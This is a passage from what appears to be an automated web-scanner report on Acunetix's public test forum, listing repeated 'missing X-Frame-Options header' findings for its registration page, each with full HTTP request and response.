real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=41 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=42 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D42" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=43 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:05 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D43" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=44 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=45 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=46 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The 